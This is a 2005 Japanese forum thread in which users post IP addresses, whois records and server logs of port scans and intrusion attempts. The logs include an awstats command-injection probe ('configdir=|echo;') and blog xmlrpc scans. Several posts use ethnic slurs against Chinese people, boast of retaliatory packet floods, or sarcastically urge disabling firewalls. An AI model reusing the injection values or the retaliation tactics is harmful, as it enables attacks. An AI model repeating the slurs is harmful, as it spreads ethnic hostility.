[19:16:40] <59.188.7.11> (0,0) [ヘッダー受信中に切断しました] - -

珍しいお客さんだな
オーストラリアか
267名無しさん@お腹いっぱい。:2005/12/15(木) 22:16:59
誰かお力ある方助けてください!うちのHPやリンク先にまでそいつに荒らされたのでご協力ください。
 221.188.193.160
 p6160-ipad03takkise.saga.ocn.ne.jp
よろしくお願いします!!
268名無しさん@お腹いっぱい。:2005/12/15(木) 22:24:02
[19:30:19] <61.1.156.88> (0,0) [異常なヘッダーを受信しました] - -

インド
269名無しさん@お腹いっぱい。:2005/12/16(金) 10:08:36
ntfksm049078.fksm.nt.adsl.ppp.infoweb.ne.jp=222.159.90.78
270名無しさん@お腹いっぱい。:2005/12/16(金) 16:37:29
www.gooddrv.pe.kr
211.184.241.251
271名無しさん@お腹いっぱい。:2005/12/16(金) 17:39:58
CHAINANET-CN
219.146.161.10

おい!チャンコロ!!いい加減にせいよ!
一日中チャンコロだらけだ!
272名無しさん@お腹いっぱい。:2005/12/17(土) 00:38:22
218.18.38.35
213.201.218.211
xydranet.de=85.214.28.58
273名無しさん@お腹いっぱい。:2005/12/17(土) 02:31:59
221.117.59.156
AU
274名無しさん@お腹いっぱい。:2005/12/17(土) 06:13:33
中国からここ毎日攻撃されます。おかしいんじゃないか?ってくらいもの凄いしつこいです。
最近じゃIP追跡しても判定不能って結果返ってきますが皆さんはどうですか?
275名無しさん@お腹いっぱい。:2005/12/17(土) 08:32:52
今日の6:19頃、いろんなとこからsmtpポートへのアタックがあったんですがうちだけですかね?
全部、helo=<WindowsServer2003WebEdition> になってる。
276名無しさん@お腹いっぱい。:2005/12/17(土) 11:26:52
CNからTCP PORT 21857禿げしくうぜー

>>274
ほんとしつこい、帯域食われてまともにHPすら見れなくなる
しばらくモデムの電源OFFすれば消えるけど、めんどくさい
277名無しさん@お腹いっぱい。:2005/12/17(土) 14:15:24
シナ畜221.38.148.30

278名無しさん@お腹いっぱい。:2005/12/17(土) 14:33:57
202.201.229.21
221.237.160.164
151.11.45.70
219-80-229-125.static.tfn.net.tw=219.80.229.125
279名無しさん@お腹いっぱい。:2005/12/17(土) 14:59:12
202.229.166.4
280超こわい:2005/12/17(土) 16:55:58
このごろよく出会い系っぽいところから頻繁にメールが届くのですが
これは不正アクセスでメールアドレス盗まれたのでしょうか?

info@のメールがすごい毎時間ごとにきますw、記載されているHPみにいっても
同じやつがつくってるっぽいのです、こんなメールです。

お金に余裕のある女性メンバー中心で運営している
当サイトでは只今新しい逆○イベントを開催しております!
★あなたは上村 希絵(社長)【ID:142588】と愛人契約(最低保証金有り〜)を結びませんか?OKであれば登録際に
名前の後に上村(社長)のID:【142588】をつけたください!
http://www.chabby-funk.com/?share


他の金持ち女性からも逆指名を受けるチャンスがあります。
12月25日 16時を過ぎると破棄とみなします。
サイト料金は一切なし!安心してご利用ください。
http://www.chabby-funk.com/?share

拒否:
[email protected]
拒否しても新しいサイトからinfo@でメールが届きます、どうすれば
救われるでしょうか。
281名無しさん@お腹いっぱい。:2005/12/17(土) 18:00:49
拒否なんてしたら藻前んとこにスパムが届いてるって、わざわざ教えにいってる様なもんだよw
282名無しさん@お腹いっぱい。:2005/12/17(土) 18:03:47
>>276
ポート開けとくからだよ。
(refuseするように)閉めておけば、同じところからは1回しかこない。
283名無しさん@お腹いっぱい。:2005/12/17(土) 21:06:32
>> 280

” Spam Mail Killer ”っつうソフトを導入して、"info@"を総蹴りにしてみそ。

284名無しさん@お腹いっぱい。:2005/12/17(土) 23:16:45
61.234.250.25
中国から。氏ね。
285名無しさん@お腹いっぱい。:2005/12/17(土) 23:22:24
205.209.143.90

アメーウィカから
286名無しさん@お腹いっぱい。:2005/12/17(土) 23:44:52
このコンピュータに対する侵入 「MS MSDTC UserAllocate BO」 の試みを
検出して遮断しました。


61.234.250.25 =218.22.154.131
さっきからシツコイ 氏ね
287名無しさん@お腹いっぱい。:2005/12/17(土) 23:47:53
>>282
それどうやってやるの?やり方わからん。
288名無しさん@お腹いっぱい。:2005/12/17(土) 23:48:24
IPアドレス 203.141.42.10
ホスト名 imgg01.img.vip.bbt.yahoo.co.jp
IPアドレス割当国 ※ 日本 (JP)

TCP SYN FLOOD
289名無しさん@お腹いっぱい。:2005/12/17(土) 23:53:47
lb.acconnect.com(199.234.90.39)
xd182.internetdsl.tpnet.pl(80.55.211.182)
80.50.64.94
86.120.221.177
85-10-201-228.clients.your-server.de(85.10.201.228)
290名無しさん@お腹いっぱい。:2005/12/17(土) 23:54:45
6回
IPアドレス 88.72.32.183
ホスト名 dslb-088-072-032-183.pools.arcor-ip.net
IPアドレス割当国 ※ ドイツ (DE)
5回
IPアドレス 61.129.32.87
ホスト名 対応するホスト名がありません
IPアドレス割当国 ※ 中国 (CN)
5回
IPアドレス 219.139.32.243
ホスト名 対応するホスト名がありません
IPアドレス割当国 ※ 中国 (CN)
4回
IPアドレス 203.179.17.151
ホスト名 www.jbook.co.jp
IPアドレス割当国 ※ 日本 (JP)

まとめて氏ね
291名無しさん@お腹いっぱい。:2005/12/18(日) 02:06:07
218.16.120.253中国 (CN)
221.214.140.165中国 (CN)
219.144.234.38中国 (CN)

支那竹は踏み台にされまくりか?
国単位でセキュリティ強化するまでwwwから切り離せよ
あんな国
292名無しさん@お腹いっぱい。:2005/12/18(日) 03:45:55
>>291
外国からの情報を規制するのに手一杯でセキュリティ強化までする余裕がありません(><)
Yahoo!やgoogleや各ISPに圧力をかけるだけで精一杯です。
中国がネット上で迷惑をかけている情報も遮断しているので、各ユーザーが気を付ける事もありませんのであしからず。
293名無しさん@お腹いっぱい。:2005/12/18(日) 03:48:48
要するに自国の利便性”のみ”を追求してる以上それに応じた対応しかしないということやね。
294名無しさん@お腹いっぱい。:2005/12/18(日) 05:19:44
中国はwwwから切り離せ
295名無しさん@お腹いっぱい。:2005/12/18(日) 07:16:24
欧州からのお客さん

217.8.138.29 ノルウェー
195.28.196.79 フランス

不正アクセスのほとんどはアジアからなんだが珍しいな
296名無しさん@お腹いっぱい。:2005/12/18(日) 08:28:10
>>287
Windowsパソコン?
ファイアウォールで必要なポートのみ開けるのがまず第一歩だけど、
ハードウェアのルータを導入するのが簡単。
Windows自体がパーソナルファイアウォール機能ってのも持ってるようだけど、
どの程度のことができるのかはよく知らんので、調べてみそ。
サーバーとか立ててる場合には、さらにサーバー上での設定をいろいろ行う。
297名無しさん@お腹いっぱい。:2005/12/19(月) 04:42:11
今日は中国から来ないよ。珍しい・・。
昨日まではPC起動したらすぐ攻撃してきたのにさ。皆はどうよ。
298287:2005/12/19(月) 05:09:46
>>296
winでルータ入れてて、フィルタリングもしてるけど
もしかして、設定間違えてるかも・・・
早々見直してみます、ありがとです。
299名無しさん@お腹いっぱい。:2005/12/19(月) 08:49:19
>>298
IPマスカレード(最近だとNAPTっていう方が多いかな)なら、
大抵はそのまんまでシャットアウトできると思うんだけど、
もしかしたらルータによってはデフォルト設定などが不十分なこともあるかな?
あと、ゲームとかで穴を開けてるなら、その開け方にも注意が必要よん。
300名無しさん@お腹いっぱい。:2005/12/19(月) 10:48:17
nthygo091098.hygo.nt.adsl.ppp.infoweb.ne.jp(222.159.227.98)
pcp06964878pcs.nftmyr01.fl.comcast.net(69.139.59.204)
www.teupen-lift.com(195.35.109.65)
137.118.28.226
301名無しさん@お腹いっぱい。:2005/12/19(月) 10:50:24
61.66.208.20

台湾
302名無しさん@お腹いっぱい。:2005/12/19(月) 10:51:22
221.8.166.138

中国
303名無しさん@お腹いっぱい。:2005/12/19(月) 12:02:32
h81172135100.kund.kommunicera.umea.se(81.172.135.100)
304名無しさん@お腹いっぱい。:2005/12/19(月) 22:06:15
あなたが検索されたアドレス[ 211.14.234.152 ]のJPNICからの応答は以下の通りです。

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 211.14.232.0/21
b. [ネットワーク名] KATCH-NET
f. [組織名] 株式会社キャッチネットワーク
g. [Organization] KATCH Network Inc.
m. [管理者連絡窓口] NK2872JP
n. [技術連絡担当者] NK2872JP
n. [技術連絡担当者] MO6056JP
p. [ネームサーバ] ns.katch.ne.jp
p. [ネームサーバ] ns2.katch.ne.jp
[割当年月日] 2005/05/09
[最終更新] 2005/05/09 22:53:08(JST)

上位情報
----------
株式会社キャッチネットワーク (KATCH Network Inc.)
[割り振り] 211.14.232.0/21
305名無しさん@お腹いっぱい。:2005/12/19(月) 22:32:52
Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 203.136.219.0/24
b. [ネットワーク名] BIGLOBE-7M
f. [組織名] BIGLOBEサービス(日本電気株式会社)
g. [Organization] NEC Corporation
m. [管理者連絡窓口] NK032JP
n. [技術連絡担当者] MK11728JP
p. [ネームサーバ] ns02.mesh.ad.jp
p. [ネームサーバ] ns03.mesh.ad.jp
[割当年月日] 2003/07/24
[返却年月日]
[最終更新] 2004/04/12 17:47:01(JST)

上位情報
----------
日本電気株式会社 (NEC Corporation)
[割り振り] 203.136.128.0/17
しつこい。。
306名無しさん@お腹いっぱい。:2005/12/20(火) 00:43:37
IPアドレス 220.150.150.49
日本時間0時32分
連続26回のアクセス
307名無しさん@お腹いっぱい。:2005/12/20(火) 00:51:59
inetnum: 220.150.0.0 - 220.150.255.255
netname: FBDC
descr: FreeBit Co.,Ltd.
descr: 13F E.Space Tower 3-6 Maruyama-cho,
descr: Shibuya-ku,Tokyo,Japan
country: JP
admin-c: JNIC1-AP
tech-c: JNIC1-AP
status: ALLOCATED PORTABLE
remarks: Email address for spam or abuse complaints : [email protected]
mnt-by: MAINT-JPNIC
mnt-lower: MAINT-JPNIC
changed: [email protected] 20040122
source: APNIC
308名無しさん@お腹いっぱい。:2005/12/20(火) 01:54:49
>>306
俺なんて不正アクセスに腹が立ったら1万回はパケット送信してやるがなw
309名無しさん@お腹いっぱい。:2005/12/20(火) 10:21:52
>>308
昔は俺もそんなことやってたなw
310名無しさん@お腹いっぱい。:2005/12/20(火) 12:59:33
220.133.92.35 台湾
218.42.119.137 日本
194.199.43.59 フランス
68.236.161.197 ???

鬱陶しいにゃー
311名無しさん@お腹いっぱい。:2005/12/20(火) 23:36:41
IPアドレス 220.150.150.49
ブロック時間 日本時間23時20分
この人昨日も凄かったけど今日も30回ほどアクセスあり
どこの誰?何も情報もってませんよ〜
312名無しさん@お腹いっぱい。:2005/12/21(水) 20:30:21
IP219.112.79.229
Node229.79.112.219.ap.yourne

ノートン先生で追っかけたけど、サーバが応答しなかった
どこだよこいつ
313名無しさん@お腹いっぱい。:2005/12/21(水) 21:11:30
>>312
229.79.112.219.ap.yournet.ne.jp
yournet.ne.jpってのは多くのISPに接続ポイントのインフラを提供している会社のひとつ。
だから一般人の感染したパソコンでしょ。
314312:2005/12/21(水) 22:09:34
>>313
そうだったのか、とんkぅす
315名無しさん@お腹いっぱい。:2005/12/22(木) 08:12:24
218.219.144.126

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 218.219.144.0/24
b. [ネットワーク名] EDITNET

うざす
f. [組織名] EditNet 株式会社
g. [Organization] EditNet, Inc.
m. [管理者連絡窓口] JP00000379
n. [技術連絡担当者] JP00000379
p. [ネームサーバ] korosuke.edit.ne.jp
p. [ネームサーバ] ns.edit.ne.jp
p. [ネームサーバ] ns1.edit.ne.jp
p. [ネームサーバ] ns2.edit.ne.jp
[割当年月日] 2002/01/25
[返却年月日]
[最終更新] 2005/06/20 23:49:12(JST)

316名無しさん@お腹いっぱい。:2005/12/22(木) 20:23:33
195.178.133.101
ウクライナ(゚ω゚=)
317名無しさん@お腹いっぱい。:2005/12/23(金) 00:12:00
25番ポートに複数の国から来ているけど、何の祭りだ?
318名無しさん@お腹いっぱい。:2005/12/23(金) 00:46:47
219.141.46.39から1200〜1400あたりを延々とポートスキャン

person: dan lu
nic-hdl: DL72-AP
e-mail: [email protected]
address: 3. east yanan road of guiyang
address: 550001 china
phone: +86-851-6861469
fax-no: +86-851-6857020
country: CN
changed: [email protected] 20030122
mnt-by: MAINT-CHINANET-GUIZHOU
source: APNIC
319名無しさん@お腹いっぱい。:2005/12/23(金) 03:09:20
194.232.80.53 25番ポートを1時間に3回程度ポートスキャンしている。
wkwihimi.hernstein.at
http://wkwihimi.hernstein.at/
320名無しさん@お腹いっぱい。:2005/12/23(金) 07:27:27
221.246.54.247 http://www.oks-net.co.jp/

多分こいつに食われて繁殖活動中
http://www.mcafee.com/japan/security/virL.asp?v=Linux/Lupper.worm
321名無しさん@お腹いっぱい。:2005/12/23(金) 08:38:28
>>320
同じとこからさっきキタw
322名無しさん@お腹いっぱい。:2005/12/23(金) 09:51:47
210.158.41.21 (speakeasy2.speakeasy.co.jp) から100回以上のSSHアタック。
この会社のメインのウェブサーバー www.speakeasy.co.jp は繋がらないみたいだから、
クラックされて落ちてるか、クラックに気づいて切り離していると思われ。
323名無しさん@お腹いっぱい。:2005/12/23(金) 11:09:59
気付いて切り離して放置してたら悪質だな(;′д`)
324名無しさん@お腹いっぱい。:2005/12/23(金) 14:30:00
www.speakeasy.co.jp て常連さんだよw
325名無しさん@お腹いっぱい。:2005/12/23(金) 14:30:46
219.240.39.130
81.82.221.38
203.162.6.66
207.161.40.164

Uzeeeeeeeeeeeeeeeeeeeeeeeeeeeee!!
326名無しさん@お腹いっぱい。:2005/12/23(金) 16:37:14
>>324
そうなんだ...でもgoogle掛からないね。それっぽい話。
327名無しさん@お腹いっぱい。:2005/12/23(金) 17:01:50
世界平和とは対抗しないこと。
ネットワークではファイアウォールがあるから攻撃されるのです。
防衛は戦争なのです。


大津市のように 『無防備宣言』 をすべきです。
すべてのポートを開いて誰でも自由にアクセスできるようにする。
この心掛けが重要なのです。


これが世界平和へと通じるのです。

さあ、
みなさんもファイアウォールを無効にして
ルーターも取り払いましょう。
世界平和のために。
328名無しさん@お腹いっぱい。:2005/12/23(金) 17:18:09
Microsoft Updateやapt-getもやめましょう
329名無しさん@お腹いっぱい。:2005/12/23(金) 18:16:26
61.116.196.143

アメリカはキャリフォルニアからいらっしゃーい

まあ、お茶でも飲もうよ?
330名無しさん@お腹いっぱい。:2005/12/23(金) 18:19:10
BD NetBus Pro2.0って何よ?
331名無しさん@お腹いっぱい。:2005/12/23(金) 18:48:47
>>330
TCP12345-12346突いてくるトロイの木馬だよ
332名無しさん@お腹いっぱい。:2005/12/23(金) 19:26:05
うおっ、すげー勉強しちゃったぜ。
333名無しさん@お腹いっぱい。:2005/12/23(金) 20:22:22
糞が進入してきたら
ゴミのIPを基地外シナ反日サイトに晒しちゃってるけど
問題ないよね
334名無しさん@お腹いっぱい。:2005/12/23(金) 21:49:14
61.14.184.242
すごい勢いでログが埋まってる
335名無しさん@お腹いっぱい。:2005/12/23(金) 23:29:56
なんかsshアタックはなれたなw
去年の夏から急増して、今じゃ年中行事。一応国内の奴だけはISPに
警告のメールを送っておくけどね。某社なんぞ反応全くなし。自分とこ
のユーザーが犯罪してるんだけどな・・・。
336名無しさん@お腹いっぱい。:2005/12/24(土) 05:53:43
先週は中国から猛烈に攻撃されたがここ最近はパッタリと止んだ。
あーすっきり。
337名無しさん@お腹いっぱい。:2005/12/24(土) 08:40:48
>>335
慣れるというか、対策をちゃんとやってれば心配には及ばないけど、
企業なんかは電話するか、レンサバ運用ならそっちに連絡した方が「いとおかし」だよ。
企業の対応が興味深いし、中堅以上のサーバー会社なら間違いなくサーバーを止める。
企業はそこから慌てふためく。
338名無しさん@お腹いっぱい。:2005/12/24(土) 11:37:03
209.219.89.130
68.90.168.82

疑わしきは罰する(晒す)
339名無しさん@お腹いっぱい。:2005/12/24(土) 16:46:56
>>9
ワロタ
340名無しさん@お腹いっぱい。:2005/12/24(土) 19:46:11
時が・・・止まった・・・
341名無しさん@お腹いっぱい。:2005/12/25(日) 09:17:46
あなたが検索されたアドレス[ 61.204.189.39 ]のJPNICからの応答は以下の通りです。

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 61.204.188.0/22
b. [ネットワーク名] POINT-EA
f. [組織名] 株式会社ドリーム・トレイン・インターネット
g. [Organization] DREAM TRAIN INTERNET,Inc.
m. [管理者連絡窓口] MH4804JP
n. [技術連絡担当者] MK10931JP
p. [ネームサーバ] ns.dti.ad.jp
p. [ネームサーバ] ns2.dti.ad.jp
[割当年月日] 2002/11/22
[最終更新] 2005/09/12 14:50:03(JST)

上位情報
----------
株式会社パワードコム (POWEREDCOM, Incorporated)
[割り振り] 61.204.128.0/17

こんどからさぁ、信頼ゾーンに入れておくからさぁ、
おじさんにロリコン物をわけてくれよぅ。
342名無しさん@お腹いっぱい。:2005/12/25(日) 09:46:42
送信元はバラバラなんだけど3時間で8333ポートを2000回以上ノックされたw

送信元、一部抜粋

217-159-252-96-dsl.prn.estpak.ee
c-24-6-44-87.hsd1.ca.comcast.net
S01060040052da136.cg.shawcable.net(68.147.57.68)
203.84.69.5.in-addr.arpa.rivernet.com.au
MYCHAT-E8BA33A8(140.113.185.63)
220-129-148-214.dynamic.hinet.net
61-70-221-181.adsl.static.giga.net.tw
24-117-68-77.cpe.cableone.net
modemcable071.107-37-24.mc.videotron.ca
ip215-128-211-87.adsl2.versatel.nl
218-34-77-245.cm.dynamic.apol.com.tw
343名無しさん@お腹いっぱい。:2005/12/25(日) 10:14:51
83.16.85.11
217.170.24.234

はい2丁追加ー!
344名無しさん@お腹いっぱい。:2005/12/25(日) 10:34:15
不正アクセスだけじゃなくて
ネットワークウイルスで攻撃してくるやつが20人くらいいるんだけど・・・
一応調べたら日本でみんなucom
これってどういうことなんですか?
345名無しさん@お腹いっぱい。:2005/12/25(日) 10:51:44
ここんとこ、ブログシステムの脆弱性狙いと思われる何種類かのHTTPアクセスが毎日のようにある。
ダミーホストで落としてるから問題は無いんだけど。
346名無しさん@お腹いっぱい。:2005/12/25(日) 11:42:06
>>337
一応SSHのくライアント認証入れてるからあのスクリプトなら安全という認識です。
正直対応するのきりがない・・・。まぁ国内だけは対応するつもりですけどね。
347名無しさん@お腹いっぱい。:2005/12/25(日) 15:50:25
あなたが検索されたアドレス[ 61.210.109.25 ]のJPNICからの応答は以下の通りです。

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 61.210.0.0/16
b. [ネットワーク名] INFOWEB
f. [組織名] InfoWeb(富士通株式会社)
g. [Organization] InfoWeb(Fujitsu Ltd.)
m. [管理者連絡窓口] KH071JP
n. [技術連絡担当者] KN6902JP
n. [技術連絡担当者] TK13654JP
p. [ネームサーバ] ns1.hyper.web.ad.jp
p. [ネームサーバ] ns3.hyper.web.ad.jp
[割当年月日] 2001/05/24
[最終更新] 2003/11/06 11:10:23(JST)

上位情報
----------
富士通株式会社 (FUJITSU LIMITED)
[割り振り] 61.210.0.0/16

ぼくちんはトロイに感染してないからアタックしても無駄なんだな
348名無しさん@お腹いっぱい。:2005/12/26(月) 11:02:12
24.222.219.188
212.238.220.136
212.41.243.217
218.249.36.88

多いなー
何が楽しいんだろ
349名無しさん@お腹いっぱい。:2005/12/26(月) 12:47:33
210.254.84.178

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 210.254.84.0/22
b. [ネットワーク名] SPN-HIKARI
f. [組織名] 東京電力株式会社
g. [Organization] The Tokyo Electric Power Company,Incorporated
m. [管理者連絡窓口] KI6575JP
n. [技術連絡担当者] KI6575JP
p. [ネームサーバ] ns.speednet.ne.jp
p. [ネームサーバ] ns2.point.ne.jp
[割当年月日] 2003/05/28
[最終更新] 2004/12/15 14:11:08(JST)
上位情報
----------
株式会社パワードコム (POWEREDCOM, Incorporated)
[割り振り] 210.254.64.0/18
下位情報

マジuzeeeeee!
350名無しさん@お腹いっぱい。:2005/12/26(月) 12:57:20
踏み台にされているのか?

210.191.208.201 - - [24/Dec/2005:00:32:11 +0900] "GET /awstats/awstats.pl?configdir=|echo; (略)
210.191.208.201 - - [24/Dec/2005:00:32:12 +0900] "GET /cgi-bin/awstats.pl?configdir=|echo; (略)
210.191.208.201 - - [24/Dec/2005:00:32:13 +0900] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo; (略)
210.191.208.201 - - [24/Dec/2005:00:32:15 +0900] "POST /xmlrpc.php HTTP/1.1" 404 279 "-" (略)
210.191.208.201 - - [24/Dec/2005:00:32:16 +0900] "POST /blog/xmlrpc.php HTTP/1.1" 404 284 "-" (略)
210.191.208.201 - - [24/Dec/2005:00:32:17 +0900] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 291 "-" (略)
210.191.208.201 - - [24/Dec/2005:00:32:18 +0900] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 292 "-" (略)
210.191.208.201 - - [24/Dec/2005:00:32:20 +0900] "POST /drupal/xmlrpc.php HTTP/1.1" 404 286 "-" (略)
210.191.208.201 - - [24/Dec/2005:00:32:21 +0900] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 292 "-" (略)
210.191.208.201 - - [24/Dec/2005:00:32:22 +0900] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 289 "-" (略)
210.191.208.201 - - [24/Dec/2005:00:32:23 +0900] "POST /xmlrpc.php HTTP/1.1" 404 279 "-" (略)
210.191.208.201 - - [24/Dec/2005:00:32:24 +0900] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 286 "-" (略)
210.191.208.201 - - [24/Dec/2005:00:32:25 +0900] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 286 "-" (略)

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 210.191.208.192/27
b. [ネットワーク名] HAKODATE-C01
f. [組織名] 野又学園函館大学
g. [Organization] Hakodate University
351名無しさん@お腹いっぱい。:2005/12/26(月) 17:02:49
あなたが検索されたアドレス[ 222.10.249.227 ]のJPNICからの応答は以下の通りです。

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 222.10.249.0/24
b. [ネットワーク名] KDDI-NET
f. [組織名] DION (KDDI株式会社)
g. [Organization] DION (KDDI CORPORATION)
m. [管理者連絡窓口] JP00000127
n. [技術連絡担当者] JP00000181
p. [ネームサーバ] dns0.dion.ne.jp
p. [ネームサーバ] dns10.dion.ne.jp
p. [ネームサーバ] dns2.dion.ne.jp
p. [ネームサーバ] ns1.neweb.ne.jp
[割当年月日] 2004/04/28
[最終更新] 2005/07/27 13:53:51(JST)

上位情報
----------
KDDI株式会社 (KDDI CORPORATION)
[割り振り] 222.10.0.0/15

トロイ探索屋さん、おつとめご苦労様です
352名無しさん@お腹いっぱい。:2005/12/26(月) 23:47:36
219.129.25.220:3826

inetnum: 219.129.25.208 - 219.129.25.223
netname: ZHANJIANG-ZHUYOUBIN-LTD
country: CN

中国のスーパーハカー?
353名無しさん@お腹いっぱい。:2005/12/27(火) 01:22:53
83.233.7.102

ウザー
354名無しさん@お腹いっぱい。:2005/12/27(火) 04:28:28
>>271
219.146.161.10
はうちにも来たよ…
いいかげんにしてくれって感じだ。
355名無しさん@お腹いっぱい。:2005/12/27(火) 13:22:03
ルータに毎日のように不正アクセスログが表示されるのですが
進入されたのでしょうか?
それとも進入しようとして失敗してるのでしょうか?
何処を見ればわかるのでしょう
356名無しさん@お腹いっぱい。:2005/12/27(火) 14:09:57
212.208.64.208

うぜー
357名無しさん@お腹いっぱい。:2005/12/27(火) 15:03:45
>>355
設定も示さず、ログも示さずじゃ、わかりっこない。
358名無しさん@お腹いっぱい。:2005/12/27(火) 18:53:52
221.245.27.50
inetnum: 221.245.27.48 - 221.245.27.55
netname: USKG0001D110
descr: KETOS
country: JP
admin-c: AT047JP
tech-c: AT047JP
remarks: This information has been partially mirrored by APNIC from
remarks: JPNIC. To obtain more specific information, please use the
remarks: JPNIC WHOIS Gateway at
remarks: http://www.nic.ad.jp/en/db/whois/en-gateway.html or
remarks: whois.nic.ad.jp for WHOIS client. (The WHOIS client
remarks: defaults to Japanese output, use the /e switch for English
remarks: output)
changed: [email protected] 20040728
source: JPNIC

うぜ〜!
359名無しさん@お腹いっぱい。:2005/12/27(火) 19:36:59
あなたが検索されたアドレス[ 222.8.221.181 ]のJPNICからの応答は以下の通りです。

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 222.8.221.0/24
b. [ネットワーク名] KDDI-NET
f. [組織名] DION (KDDI株式会社)
g. [Organization] DION (KDDI CORPORATION)
m. [管理者連絡窓口] JP00000127
n. [技術連絡担当者] JP00000181
p. [ネームサーバ] dns0.dion.ne.jp
p. [ネームサーバ] dns10.dion.ne.jp
p. [ネームサーバ] dns2.dion.ne.jp
p. [ネームサーバ] ns1.neweb.ne.jp
[割当年月日] 2004/03/25
[最終更新] 2005/07/27 13:53:51(JST)

上位情報
----------
KDDI株式会社 (KDDI CORPORATION)
[割り振り] 222.8.0.0/16

ねえぼくちゃん、しつこいと逮捕しちゃうぞ♪
360名無しさん@お腹いっぱい。:2005/12/28(水) 00:11:55
[18:03:37] <84.21.209.193> (149,0) [あなたのアクセスしたURLは、このサーバの管理下ではありません] POST /_vti_bin/_vti_aut/fp30reg.dll
[18:03:40] <84.21.209.193> (0,0) [異常なヘッダーを受信しました] - -
[18:13:21] <84.21.209.193> (149,0) [あなたのアクセスしたURLは、このサーバの管理下ではありません] POST /_vti_bin/_vti_aut/fp30reg.dll
[18:13:24] <84.21.209.193> (0,0) [異常なヘッダーを受信しました] - -
[18:35:17] <84.21.209.193> (149,0) [あなたのアクセスしたURLは、このサーバの管理下ではありません] POST /_vti_bin/_vti_aut/fp30reg.dll
[18:37:39] <84.21.209.193> (0,0) [異常なヘッダーを受信しました] - -
[18:46:34] <84.21.209.193> (149,0) [あなたのアクセスしたURLは、このサーバの管理下ではありません] POST /_vti_bin/_vti_aut/fp30reg.dll
[18:47:03] <84.21.209.193> (0,0) [異常なヘッダーを受信しました] - -
[18:50:47] <84.21.209.193> (149,0) [あなたのアクセスしたURLは、このサーバの管理下ではありません] POST /_vti_bin/_vti_aut/fp30reg.dll
[18:51:10] <84.21.209.193> (0,0) [異常なヘッダーを受信しました] - -
[18:53:15] <84.21.209.193> (149,0) [あなたのアクセスしたURLは、このサーバの管理下ではありません] POST /_vti_bin/_vti_aut/fp30reg.dll
[19:22:08] <84.21.209.193> (149,0) [あなたのアクセスしたURLは、このサーバの管理下ではありません] POST /_vti_bin/_vti_aut/fp30reg.dll
[19:24:51] <84.21.209.193> (0,0) [異常なヘッダーを受信しました] - -

めずらしいお客さん
361名無しさん@お腹いっぱい。:2005/12/28(水) 03:33:52
一連の、xmlrpc.php へpostログですが、実際にphpファイル置いて
ウインドウオープンさせるスクリプトなど置いた場合、こっちも悪いやつ
になっちゃいますか? それともpostだから動かない?
362名無しさん@お腹いっぱい。:2005/12/28(水) 07:15:37
理屈は知っているからファイアーウォールに全部お任せで、
外部パケットは全部遮断。
ログなんてもう見てもしゃあないから取っていない。
静か 静か だけどDOS攻撃されたら100倍にして返してやるから覚悟しろよ。
363名無しさん@お腹いっぱい。:2005/12/28(水) 08:50:23
>>361
おいおい、あれを人がブラウザからポチポチやっていると思ってんのか?
364名無しさん@お腹いっぱい。:2005/12/28(水) 08:58:11
シナ方面のバカからしか来ないから全部無視しとけ
365名無しさん@お腹いっぱい。:2005/12/28(水) 10:52:57
みなさんもシナから受けてるんですね。自分もでしたのでなんかホッとします。ハイ。
366名無しさん@お腹いっぱい。:2005/12/28(水) 12:51:40
グローバルなIPアドレスってなんだかなぁ〜って気がします。
どうして国別に分かる番号を埋めなかったのでしょうか。
閉めるにしても、たくさん有り過ぎる!
367名無しさん@お腹いっぱい。:2005/12/28(水) 12:54:18
>>366
サーバー立ててなきゃ通す必要性がないだろう
それとも、なんかのサービスに外部からアクセスする必要があるのか?
368名無しさん@お腹いっぱい。:2005/12/28(水) 13:10:01
>>366
ああ ゲーム厨かよw
369名無しさん@お腹いっぱい。:2005/12/28(水) 18:52:56
外国を閉めるんじゃなくて、日本だけ開けとけばよござんす。
JPNIC管轄と、APNIC管轄でJPNIC管理のもの、合計で344行以下で範囲指定できるはず。
370名無しさん@お腹いっぱい。:2005/12/28(水) 20:27:00
本当にゲーム程度の事なら全部開けときゃいいじゃんって気もする
ゲームのセキュリティーホールがそんなに心配か?
もし突かれたらシステム全体が危険になるほどそのゲームは重要な位置にあるのか?
このケースがどうなのかは知らんが、目的と手段が入れ替わってるような奴をたまに見かける
371名無しさん@お腹いっぱい。:2005/12/28(水) 21:23:45
実際にネットゲームはヤバイよ
そのポートでリモートコントロール出来るように作られていれば、
理論上は何をするのでも可能
キーロガーをインストールするのも情報ファイルを盗むのでも

要は他のトロイと一緒できっかけは1つで十分
ポートが開けばそれを使ってリモート操作すればいいだけ
普通は開いていたとしてもファイアーウォールが遮断してくれるんだけどね
372名無しさん@お腹いっぱい。:2005/12/28(水) 21:33:24
鯖立てると必ずゲームポート突付いてくるんだよなあ
373名無しさん@お腹いっぱい。:2005/12/28(水) 22:41:31
>リモートコントロール
たかだかネットゲームにどの程度の権限がある事やら
バグ持ちのftpやhttpより危険なネトゲの具体例があったっけ?
危険があったとしても、少なくともリモートコントロールよりは別種のバグの方が怖そうだ
374名無しさん@お腹いっぱい。:2005/12/28(水) 22:49:42
というか>>366は一言もゲームだなんて言ってないだろ
ネットゲームだなんて妄想に乗る方がおかしいw
375名無しさん@お腹いっぱい。:2005/12/29(木) 01:20:08
あらゆるIPからポート7743を突かれる
winnyやってないのに
376名無しさん@お腹いっぱい。:2005/12/29(木) 02:00:34
366des
Webとメールサーバ立ててます。
日本だけじゃダメで外国とのメールのやりとりもあるので無理。
チャイナと半島さえクリアすれば99%!という話も聞きますので。
あのあたりは物理的に隔離した方がいいんでないのか!と国連決議希望。
377名無しさん@お腹いっぱい。:2005/12/29(木) 05:04:58
こんな時間に大阪キタか。
ふみんかな?
378名無しさん@お腹いっぱい。:2005/12/29(木) 10:32:49
>あのあたりは物理的に隔離した方がいいんでないのか

